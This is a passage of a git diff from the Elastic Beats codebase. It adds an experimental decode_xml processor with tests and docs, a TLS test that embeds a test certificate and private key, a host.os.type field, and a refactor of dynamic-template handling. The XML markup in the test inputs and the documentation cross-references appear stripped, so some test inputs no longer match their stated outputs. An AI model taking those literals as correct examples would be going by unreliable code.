index 45c0ebf1f7fd..5d610af5bf4a 100644 --- a/libbeat/common/transport/tlscommon/tls_test.go +++ b/libbeat/common/transport/tlscommon/tls_test.go @@ -546,6 +546,7 @@ NHy+PwkYsHhbrPl4dgStTNXLenJLIJ+Ke0Pcld4ZPfYdSyu/Tv4rNswZBNpNsW9K nygO9KTJuUiBrLr0AHEnqko= -----END PRIVATE KEY----- ` + t.Run("embed", func(t *testing.T) { // Create a dummy configuration and append the CA after. cfg, err := load(` @@ -568,6 +569,48 @@ supported_protocols: null assert.NotNil(t, tlsC) }) + t.Run("embed small key", func(t *testing.T) { + // Create a dummy configuration and append the CA after. + cfg, err := load(` +enabled: true +verification_mode: null +certificate: null +key: null +key_passphrase: null +certificate_authorities: +cipher_suites: null +curve_types: null +supported_protocols: null + `) + certificate := ` +-----BEGIN CERTIFICATE----- +MIIBmzCCAUCgAwIBAgIRAOQpDyaFimzmueynALHkFEcwCgYIKoZIzj0EAwIwJjEk +MCIGA1UEChMbVEVTVCAtIEVsYXN0aWMgSW50ZWdyYXRpb25zMB4XDTIxMDIwMjE1 +NTkxMFoXDTQxMDEyODE1NTkxMFowJjEkMCIGA1UEChMbVEVTVCAtIEVsYXN0aWMg +SW50ZWdyYXRpb25zMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEBc7UEvBd+5SG +Z6QQfgBaPh/VAlf7ovpa/wfSmbHfBhee+dTvdAO1p90lannCkZmc7OfWAlQ1eTgJ +QW668CJwE6NPME0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMB +MAwGA1UdEwEB/wQCMAAwGAYDVR0RBBEwD4INZWxhc3RpYy1hZ2VudDAKBggqhkjO +PQQDAgNJADBGAiEAhpGWL4lxsdb3+hHv0y4ppw6B7IJJLCeCwHLyHt2Dkx4CIQD6 +OEU+yuHzbWa18JVkHafxwnpwQmxwZA3VNitM/AyGTQ== +-----END CERTIFICATE----- +` + key := ` +-----BEGIN PRIVATE KEY----- +MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgFDQJ1CPLXrUbUFqj +ED8dqsGuVQdcPK7CHpsCeTtAgQqhRANCAAQFztQS8F37lIZnpBB+AFo+H9UCV/ui ++lr/B9KZsd8GF5751O90A7Wn3SVqecKRmZzs59YCVDV5OAlBbrrwInAT +-----END PRIVATE KEY----- +` + cfg.Certificate.Certificate = certificate + cfg.Certificate.Key = key + + tlsC, err := LoadTLSConfig(cfg) + assert.NoError(t, err) + + assert.NotNil(t, tlsC) + }) + t.Run("From disk", func(t *testing.T) { k, err := ioutil.TempFile("", "certificate.key") k.WriteString(key) diff --git a/libbeat/docs/processors-list.asciidoc b/libbeat/docs/processors-list.asciidoc index 367bce4ae592..e2670ebc39e3 100644 --- a/libbeat/docs/processors-list.asciidoc +++ b/libbeat/docs/processors-list.asciidoc @@ -110,6 +110,9 @@ endif::[] ifndef::no_urldecode_processor[] * <> endif::[] +ifndef::no_decode_xml_processor[] +* <> +endif::[] //# end::processors-list[] //# tag::processors-include[] @@ -225,5 +228,8 @@ endif::[] ifndef::no_urldecode_processor[] include::{libbeat-processors-dir}/urldecode/docs/urldecode.asciidoc[] endif::[] +ifndef::no_decode_xml_processor[] +include::{libbeat-processors-dir}/decode_xml/docs/decode_xml.asciidoc[] +endif::[] //# end::processors-include[] diff --git a/libbeat/docs/release-notes/breaking/breaking-7.11.asciidoc b/libbeat/docs/release-notes/breaking/breaking-7.11.asciidoc new file mode 100644 index 000000000000..42aa3e693e46 --- /dev/null +++ b/libbeat/docs/release-notes/breaking/breaking-7.11.asciidoc @@ -0,0 +1,29 @@ +[[breaking-changes-7.11]] + +=== Breaking changes in 7.11 +++++ +7.11 +++++ + +//NOTE: The notable-breaking-changes tagged regions are re-used in the +//Installation and Upgrade Guide + +// tag::notable-breaking-changes[] + +[float] +==== Field changes + +The following field changes are potentially breaking for anything that relies +on these fields: + +* In {filebeat}, the `suricata.eve.timestamp` alias field has been removed from +the Suricata module. + +* In {auditbeat}, the file integrity dataset no longer includes a leading dot +in `file.extension` values. For example, it will report `png` instead of `.png` +to comply with Elastic Common Schema (ECS). + +// end::notable-breaking-changes[] + +See the <> for a complete list of changes, +including changes to beta or experimental functionality. diff --git a/libbeat/docs/release-notes/breaking/breaking.asciidoc b/libbeat/docs/release-notes/breaking/breaking.asciidoc index bee320fc7d50..916b4670802f 100644 --- a/libbeat/docs/release-notes/breaking/breaking.asciidoc +++ b/libbeat/docs/release-notes/breaking/breaking.asciidoc @@ -11,6 +11,8 @@ changes, but there are breaking changes between major versions (e.g. 6.x to See the following topics for a description of breaking changes: +* <> + * <> * <> @@ -33,6 +35,8 @@ See the following topics for a description of breaking changes: * <> +include::breaking-7.11.asciidoc[] + include::breaking-7.10.asciidoc[] include::breaking-7.9.asciidoc[] diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index b870aabf0776..b84a4aa0ae91 100644 --- a/libbeat/docs/release.asciidoc +++ b/libbeat/docs/release.asciidoc @@ -8,6 +8,8 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> +* <> * <> * <> * <> diff --git a/libbeat/docs/shared-beats-attributes.asciidoc b/libbeat/docs/shared-beats-attributes.asciidoc index 56dee789d4d2..c2e83951bc55 100644 --- a/libbeat/docs/shared-beats-attributes.asciidoc +++ b/libbeat/docs/shared-beats-attributes.asciidoc @@ -18,4 +18,3 @@ :beat_version_key: agent.version :access_role: {beat_default_index_prefix}_reader :repo: Beats -:release-state: released diff --git a/libbeat/docs/version.asciidoc b/libbeat/docs/version.asciidoc index 89578a6f7a27..40b2d1d836d4 100644 --- a/libbeat/docs/version.asciidoc +++ b/libbeat/docs/version.asciidoc @@ -1,6 +1,6 @@ :stack-version: 8.0.0 :doc-branch: master -:go-version: 1.15.7 +:go-version: 1.15.8 :release-state: unreleased :python: 3.7 :docker: 1.12 diff --git a/libbeat/metric/system/host/host.go b/libbeat/metric/system/host/host.go index 0d143ed2499e..6f5c9c15849a 100644 --- a/libbeat/metric/system/host/host.go +++ b/libbeat/metric/system/host/host.go @@ -53,7 +53,9 @@ func MapHostInfo(info types.HostInfo) common.MapStr { if info.OS.Build != "" { data.Put("host.os.build", info.OS.Build) } - + if info.OS.Type != "" { + data.Put("host.os.type", info.OS.Type) + } return data } diff --git a/libbeat/processors/add_host_metadata/add_host_metadata_test.go b/libbeat/processors/add_host_metadata/add_host_metadata_test.go index c41c76966351..6120269395c4 100644 --- a/libbeat/processors/add_host_metadata/add_host_metadata_test.go +++ b/libbeat/processors/add_host_metadata/add_host_metadata_test.go @@ -75,6 +75,10 @@ func TestConfigDefault(t *testing.T) { v, err = newEvent.GetValue("host.mac") assert.NoError(t, err) assert.NotNil(t, v) + + v, err = newEvent.GetValue("host.os.type") + assert.NoError(t, err) + assert.NotNil(t, v) } func TestConfigNetInfoDisabled(t *testing.T) { @@ -118,6 +122,10 @@ func TestConfigNetInfoDisabled(t *testing.T) { v, err = newEvent.GetValue("host.mac") assert.Error(t, err) assert.Nil(t, v) + + v, err = newEvent.GetValue("host.os.type") + assert.NoError(t, err) + assert.NotNil(t, v) } func TestConfigName(t *testing.T) { diff --git a/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc b/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc index 21d308b23c1d..c2a3b52994ec 100644 --- a/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc +++ b/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc @@ -57,6 +57,7 @@ The fields added to the event look like the following: "id":"", "os":{ "family":"darwin", + "type":"macos", "build":"16G1212", "platform":"darwin", "version":"10.12.6", diff --git a/libbeat/processors/decode_xml/config.go b/libbeat/processors/decode_xml/config.go new file mode 100644 index 000000000000..289b2eaa0e97 --- /dev/null +++ b/libbeat/processors/decode_xml/config.go @@ -0,0 +1,36 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +type decodeXMLConfig struct { + Field string `config:"field" validate:"required"` + Target *string `config:"target_field"` + OverwriteKeys bool `config:"overwrite_keys"` + DocumentID string `config:"document_id"` + ToLower bool `config:"to_lower"` + IgnoreMissing bool `config:"ignore_missing"` + IgnoreFailure bool `config:"ignore_failure"` +} + +func defaultConfig() decodeXMLConfig { + return decodeXMLConfig{ + Field: "message", + OverwriteKeys: true, + ToLower: true, + } +} diff --git a/libbeat/processors/decode_xml/decode_xml.go b/libbeat/processors/decode_xml/decode_xml.go new file mode 100644 index 000000000000..0b229cff3d23 --- /dev/null +++ b/libbeat/processors/decode_xml/decode_xml.go @@ -0,0 +1,150 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "encoding/json" + "errors" + "fmt" + "strings" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/cfgwarn" + "github.com/elastic/beats/v7/libbeat/common/encoding/xml" + "github.com/elastic/beats/v7/libbeat/common/jsontransform" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/libbeat/processors" + "github.com/elastic/beats/v7/libbeat/processors/checks" + jsprocessor "github.com/elastic/beats/v7/libbeat/processors/script/javascript/module/processor" +) + +type decodeXML struct { + decodeXMLConfig + log *logp.Logger +} + +var ( + errFieldIsNotString = errors.New("field value is not a string") +) + +const ( + procName = "decode_xml" + logName = "processor." + procName +) + +func init() { + processors.RegisterPlugin(procName, + checks.ConfigChecked(New, + checks.RequireFields("fields"), + checks.AllowedFields("fields", "overwrite_keys", "add_error_key", "target", "document_id"))) + jsprocessor.RegisterPlugin(procName, New) +} + +// New constructs a new decode_xml processor. +func New(c *common.Config) (processors.Processor, error) { + config := defaultConfig() + + if err := c.Unpack(&config); err != nil { + return nil, fmt.Errorf("fail to unpack the "+procName+" processor configuration: %s", err) + } + + return newDecodeXML(config) +} + +func newDecodeXML(config decodeXMLConfig) (processors.Processor, error) { + cfgwarn.Experimental("The " + procName + " processor is experimental.") + + // Default target to overwriting field. + if config.Target == nil { + config.Target = &config.Field + } + + return &decodeXML{ + decodeXMLConfig: config, + log: logp.NewLogger(logName), + }, nil +} + +func (x *decodeXML) Run(event *beat.Event) (*beat.Event, error) { + if err := x.run(event); err != nil && !x.IgnoreFailure { + err = fmt.Errorf("failed in decode_xml on the %q field: %w", x.Field, err) + event.PutValue("error.message", err.Error()) + return event, err + } + return event, nil +} + +func (x *decodeXML) run(event *beat.Event) error { + data, err := event.GetValue(x.Field) + if err != nil { + if x.IgnoreMissing && err == common.ErrKeyNotFound { + return nil + } + return err + } + + text, ok := data.(string) + if !ok { + return errFieldIsNotString + } + + xmlOutput, err := x.decodeField(text) + if err != nil { + return err + } + + var id string + if tmp, err := common.MapStr(xmlOutput).GetValue(x.DocumentID); err == nil { + if v, ok := tmp.(string); ok { + id = v + common.MapStr(xmlOutput).Delete(x.DocumentID) + } + } + + if *x.Target != "" { + if _, err = event.PutValue(*x.Target, xmlOutput); err != nil { + return fmt.Errorf("failed to put value %v into field %q: %w", xmlOutput, *x.Target, err) + } + } else { + jsontransform.WriteJSONKeys(event, xmlOutput, false, x.OverwriteKeys, !x.IgnoreFailure) + } + + if id != "" { + event.SetID(id) + } + return nil +} + +func (x *decodeXML) decodeField(data string) (decodedData map[string]interface{}, err error) { + dec := xml.NewDecoder(strings.NewReader(data)) + if x.ToLower { + dec.LowercaseKeys() + } + + out, err := dec.Decode() + if err != nil { + return nil, fmt.Errorf("error decoding XML field: %w", err) + } + return out, nil +} + +func (x *decodeXML) String() string { + json, _ := json.Marshal(x.decodeXMLConfig) + return procName + "=" + string(json) +} diff --git a/libbeat/processors/decode_xml/decode_xml_test.go b/libbeat/processors/decode_xml/decode_xml_test.go new file mode 100644 index 000000000000..26d075bf3a47 --- /dev/null +++ b/libbeat/processors/decode_xml/decode_xml_test.go @@ -0,0 +1,467 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/common" +) + +var ( + testXMLTargetField = "xml" + testRootTargetField = "" +) + +func TestDecodeXML(t *testing.T) { + var testCases = []struct { + description string + config decodeXMLConfig + Input common.MapStr + Output common.MapStr + error bool + errorMessage string + }{ + { + description: "Simple xml decode with target field set", + config: decodeXMLConfig{ + Field: "message", + Target: &testXMLTargetField, + }, + Input: common.MapStr{ + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + Output: common.MapStr{ + "xml": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions", + }, + }, + }, + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + }, + { + description: "Test with target set to root", + config: decodeXMLConfig{ + Field: "message", + Target: &testRootTargetField, + }, + Input: common.MapStr{ + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + Output: common.MapStr{ + "catalog": common.MapStr{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions", + }, + }, + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + }, + { + description: "Simple xml decode with xml string to same field name when Target is null", + config: decodeXMLConfig{ + Field: "message", + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }, + Output: common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions", + }, + }, + }, + }, + }, + { + description: "Decoding with array input", + config: decodeXMLConfig{ + Field: "message", + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + + Ralls, Kim + Midnight Rain + Some review. + + `, + }, + Output: common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "title": "The Recognitions", + }, + map[string]interface{}{ + "author": "Ralls, Kim", + "review": "Some review.", + "title": "Midnight Rain", + }, + }, + }, + }, + }, + }, + { + description: "Decoding with multiple xml objects", + config: decodeXMLConfig{ + Field: "message", + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + + Ralls, Kim + Midnight Rain + Some review. + + + + Ralls, Kim + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + + `, + }, + Output: common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "title": "The Recognitions", + }, + map[string]interface{}{ + "author": "Ralls, Kim", + "review": "Some review.", + "title": "Midnight Rain", + }, + }, + "secondcategory": map[string]interface{}{ + "paper": map[string]interface{}{ + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "id": "bk102", + "test2": "Ralls, Kim", + }, + }, + }, + }, + }, + }, + { + description: "Decoding with broken XML format, with IgnoreFailure false", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: false, + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + }, + Output: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + "error": common.MapStr{"message": "failed in decode_xml on the \"message\" field: error decoding XML field: XML syntax error on line 7: element closed by "}, + }, + error: true, + errorMessage: "error decoding XML field:", + }, + { + description: "Decoding with broken XML format, with IgnoreFailure true", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: true, + }, + Input: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + }, + Output: common.MapStr{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + catalog>`, + }, + }, + { + description: "Test when the XML field is empty, IgnoreMissing false", + config: decodeXMLConfig{ + Field: "message2", + IgnoreMissing: false, + }, + Input: common.MapStr{ + "message": "testing message", + }, + Output: common.MapStr{ + "message": "testing message", + "error": common.MapStr{"message": "failed in decode_xml on the \"message2\" field: key not found"}, + }, + error: true, + errorMessage: "key not found", + }, + { + description: "Test when the XML field is empty IgnoreMissing true", + config: decodeXMLConfig{ + Field: "message2", + IgnoreMissing: true, + }, + Input: common.MapStr{ + "message": "testing message", + }, + Output: common.MapStr{ + "message": "testing message", + }, + }, + { + description: "Test when the XML field not a string, IgnoreFailure false", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: false, + }, + Input: common.MapStr{ + "message": 1, + }, + Output: common.MapStr{ + "message": 1, + "error": common.MapStr{"message": "failed in decode_xml on the \"message\" field: field value is not a string"}, + }, + error: true, + errorMessage: "field value is not a string", + }, + { + description: "Test when the XML field not a string, IgnoreFailure true", + config: decodeXMLConfig{ + Field: "message", + IgnoreFailure: true, + }, + Input: common.MapStr{ + "message": 1, + }, + Output: common.MapStr{ + "message": 1, + }, + }, + } + + for _, test := range testCases { + test := test + t.Run(test.description, func(t *testing.T) { + t.Parallel() + + f, err := newDecodeXML(test.config) + require.NoError(t, err) + + event := &beat.Event{ + Fields: test.Input, + } + newEvent, err := f.Run(event) + if !test.error { + assert.NoError(t, err) + } else { + if assert.Error(t, err) { + assert.Contains(t, err.Error(), test.errorMessage) + } + } + assert.Equal(t, test.Output, newEvent.Fields) + }) + } +} + +func BenchmarkProcessor_Run(b *testing.B) { + c := defaultConfig() + target := "xml" + c.Target = &target + p, err := newDecodeXML(c) + require.NoError(b, err) + + b.Run("single_object", func(b *testing.B) { + evt := &beat.Event{Fields: map[string]interface{}{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + }} + + for i := 0; i < b.N; i++ { + _, err = p.Run(evt) + if err != nil { + b.Fatal(err) + } + } + }) + + b.Run("nested_and_array_object", func(b *testing.B) { + evt := &beat.Event{Fields: map[string]interface{}{ + "message": ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + + Ralls, Kim + Midnight Rain + Some review. + + + + Ralls, Kim + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + + `, + }} + + for i := 0; i < b.N; i++ { + _, err = p.Run(evt) + if err != nil { + b.Fatal(err) + } + } + }) +} + +func TestXMLToDocumentID(t *testing.T) { + p, err := newDecodeXML(decodeXMLConfig{ + Field: "message", + DocumentID: "catalog.book.seq", + }) + require.NoError(t, err) + + input := common.MapStr{ + "message": ` + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + } + actual, err := p.Run(&beat.Event{Fields: input}) + require.NoError(t, err) + + wantFields := common.MapStr{ + "message": map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "title": "The Recognitions", + }, + }, + }, + } + wantMeta := common.MapStr{ + "_id": "10", + } + + assert.Equal(t, wantFields, actual.Fields) + assert.Equal(t, wantMeta, actual.Meta) +} diff --git a/libbeat/processors/decode_xml/docs/decode_xml.asciidoc b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc new file mode 100644 index 000000000000..ded0543514ac --- /dev/null +++ b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc @@ -0,0 +1,115 @@ +[[decode_xml]] +=== Decode XML + +++++ +decode_xml +++++ + +experimental[] + +The `decode_xml` processor decodes XML data that is stored under the `field` +key. It outputs the result into the `target_field`. + +This example demonstrates how to decode an XML string contained in the `message` +field and write the resulting fields into the root of the document. Any fields +that already exist will be overwritten. + +[source,yaml] +------- +processors: + - decode_xml: + field: message + target_field: "" + overwrite_keys: true +------- + +By default any decoding errors that occur will stop the processing chain and the +error will be added to `error.message` field. To ignore all errors and continue +to the next processor you can set `ignore_failure: true`. To specifically +ignore failures caused by `field` not existing use `ignore_missing`. + +[source,yaml] +------- +processors: + - decode_xml: + field: example + target_field: xml + ignore_missing: true + ignore_failure: true +------- + +By default all keys converted from XML will have the names converted to +lowercase. If there is a need to disable this behavior it is possible to use the +below example: + +[source,yaml] +------- +processors: + - decode_xml: + field: message + target_field: xml + to_lower: false +------- + +Example XML input: + +[source,xml] +------------------------------------------------------------------------------- +{ + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + +} +------------------------------------------------------------------------------- + +Will produce the following output: + +[source,json] +------------------------------------------------------------------------------- +{ + "xml": { + "catalog": { + "book": { + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions" + } + } + } +} +------------------------------------------------------------------------------- + + +The supported configuration options are: + +`field`:: (Required) Source field containing the XML. Defaults to `message`. + +`target_field`:: (Optional) The field under which the decoded XML will be +written. By default the decoded XML object replaces the field from which it was +read. To merge the decoded XML fields into the root of the event specify +`target_field` with an empty string (`target_field: ""`). Note that the `null` +value (`target_field:`) is treated as if the field was not set at all. + +`overwrite_keys`:: (Optional) A boolean that specifies whether keys that already +exist in the event are overwritten by keys from the decoded XML object. The +default value is false. + +`to_lower`:: (Optional) Converts all keys to lowercase. Accepts either true or +false. The default value is true. + +`document_id`:: (Optional) XML key to use as the document ID. If configured, the +field will be removed from the original XML document and stored in +`@metadata._id`. + +`ignore_missing`:: (Optional) If `true` the processor will not return an error +when a specified field does not exist. Defaults to `false`. + +`ignore_failure`:: (Optional) Ignore all errors produced by the processor. +Defaults to `false`. + +See <> for a list of supported conditions. diff --git a/libbeat/processors/script/docs/script.asciidoc b/libbeat/processors/script/docs/script.asciidoc index 60636f3fcac5..868d94f6b306 100644 --- a/libbeat/processors/script/docs/script.asciidoc +++ b/libbeat/processors/script/docs/script.asciidoc @@ -73,7 +73,7 @@ function process(event) { } function test() { - var event = process(new Event({event: {code: 1102})); + var event = process(new Event({event: {code: 1102}})); if (event.Get("event.action") !== "cleared") { throw "expected event.action === cleared"; } diff --git a/libbeat/scripts/Makefile b/libbeat/scripts/Makefile index 3bdf47741581..9598cdd78762 100755 --- a/libbeat/scripts/Makefile +++ b/libbeat/scripts/Makefile @@ -75,9 +75,6 @@ GOIMPORTS_REPO?=golang.org/x/tools/cmd/goimports GOIMPORTS_LOCAL_PREFIX?=github.com/elastic GOLINT=golint GOLINT_REPO?=golang.org/x/lint/golint -REVIEWDOG?=reviewdog -conf ${ES_BEATS}/reviewdog.yml -REVIEWDOG_OPTIONS?=-diff "git diff master" -REVIEWDOG_REPO?=github.com/reviewdog/reviewdog/cmd/reviewdog PROCESSES?= 4 TIMEOUT?= 90 PYTHON_TEST_FILES?=$(shell find . -type f -name 'test_*.py' -not -path "*/build/*" -not -path "*/vendor/*" 2>/dev/null) @@ -172,11 +169,6 @@ fmt: add-headers python-env ## @build Runs `goimports -l -w` and `autopep8`on th @goimports -local ${GOIMPORTS_LOCAL_PREFIX} -l -w ${GOFILES_NOVENDOR} @${FIND} -name '*.py' -exec ${PYTHON_ENV}/bin/autopep8 --in-place --max-line-length 120 {} \; -.PHONY: lint -lint: - @go {INSTALL_CMD} $(GOLINT_REPO) $(REVIEWDOG_REPO) - $(REVIEWDOG) $(REVIEWDOG_OPTIONS) - .PHONY: clean clean:: mage ## @build Cleans up all files generated by the build steps @mage clean diff --git a/libbeat/template/processor.go b/libbeat/template/processor.go index 15bc2d2790eb..6a6add512fa9 100644 --- a/libbeat/template/processor.go +++ b/libbeat/template/processor.go @@ -31,6 +31,11 @@ type Processor struct { EsVersion common.Version Migration bool ElasticLicensed bool + + // dynamicTemplatesMap records which dynamic templates have been added, to prevent duplicates. + dynamicTemplatesMap map[dynamicTemplateKey]common.MapStr + // dynamicTemplates records the dynamic templates in the order they were added. + dynamicTemplates []common.MapStr } var ( @@ -420,7 +425,7 @@ func (p *Processor) object(f *mapping.Field) common.MapStr { if len(otParams) > 1 { path = fmt.Sprintf("%s_%s", path, matchingType) } - addDynamicTemplate(path, pathMatch, dynProperties, matchingType) + p.addDynamicTemplate(path, pathMatch, dynProperties, matchingType) } properties := getDefaultProperties(f) @@ -436,8 +441,27 @@ func (p *Processor) object(f *mapping.Field) common.MapStr { return properties } -func addDynamicTemplate(path string, pathMatch string, properties common.MapStr, matchType string) { - template := common.MapStr{ +type dynamicTemplateKey struct { + path string + pathMatch string + matchType string +} + +func (p *Processor) addDynamicTemplate(path string, pathMatch string, properties common.MapStr, matchType string) { + key := dynamicTemplateKey{ + path: path, + pathMatch: pathMatch, + matchType: matchType, + } + if p.dynamicTemplatesMap == nil { + p.dynamicTemplatesMap = make(map[dynamicTemplateKey]common.MapStr) + } else { + if _, ok := p.dynamicTemplatesMap[key]; ok { + // Dynamic template already added. + return + } + } + dynamicTemplate := common.MapStr{ // Set the path of the field as name path: common.MapStr{ "mapping": properties, @@ -445,8 +469,8 @@ func addDynamicTemplate(path string, pathMatch string, properties common.MapStr, "path_match": pathMatch, }, } - - dynamicTemplates = append(dynamicTemplates, template) + p.dynamicTemplatesMap[key] = dynamicTemplate + p.dynamicTemplates = append(p.dynamicTemplates, dynamicTemplate) } func getDefaultProperties(f *mapping.Field) common.MapStr { diff --git a/libbeat/template/processor_test.go b/libbeat/template/processor_test.go index 0765e84d69f2..1fb3cfb08e07 100644 --- a/libbeat/template/processor_test.go +++ b/libbeat/template/processor_test.go @@ -317,7 +317,6 @@ func TestProcessor(t *testing.T) { } func TestDynamicTemplates(t *testing.T) { - p := &Processor{} tests := []struct { field mapping.Field expected []common.MapStr @@ -493,9 +492,10 @@ func TestDynamicTemplates(t *testing.T) { } for _, test := range tests { - dynamicTemplates = nil + p := &Processor{} p.object(&test.field) - assert.Equal(t, test.expected, dynamicTemplates) + p.object(&test.field) // should not be added twice + assert.Equal(t, test.expected, p.dynamicTemplates) } } diff --git a/libbeat/template/template.go b/libbeat/template/template.go index f6366ddc6761..8ed8886e9196 100644 --- a/libbeat/template/template.go +++ b/libbeat/template/template.go @@ -37,9 +37,6 @@ var ( defaultNumberOfRoutingShards = 30 defaultMaxDocvalueFieldsSearch = 200 - // Array to store dynamicTemplate parts in - dynamicTemplates []common.MapStr - defaultFields []string ) @@ -147,7 +144,6 @@ func (t *Template) load(fields mapping.Fields) (common.MapStr, error) { t.Lock() defer t.Unlock() - dynamicTemplates = nil defaultFields = nil var err error @@ -164,7 +160,8 @@ func (t *Template) load(fields mapping.Fields) (common.MapStr, error) { if err := processor.Process(fields, nil, properties); err != nil { return nil, err } - output := t.Generate(properties, dynamicTemplates) + + output := t.Generate(properties, processor.dynamicTemplates) return output, nil } @@ -255,17 +252,16 @@ func (t *Template) GetPattern() string { func (t *Template) Generate(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { switch t.templateType { case IndexTemplateLegacy: - return t.generateLegacy(properties) + return t.generateLegacy(properties, dynamicTemplates) case IndexTemplateComponent: - return t.generateComponent(properties) + return t.generateComponent(properties, dynamicTemplates) case IndexTemplateIndex: - return t.generateIndex(properties) - default: + return t.generateIndex(properties, dynamicTemplates) } return nil } -func (t *Template) generateLegacy(properties common.MapStr) common.MapStr { +func (t *Template) generateLegacy(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { keyPattern, patterns := buildPatternSettings(t.esVersion, t.GetPattern()) return common.MapStr{ keyPattern: patterns, @@ -284,7 +280,7 @@ func (t *Template) generateLegacy(properties common.MapStr) common.MapStr { } } -func (t *Template) generateComponent(properties common.MapStr) 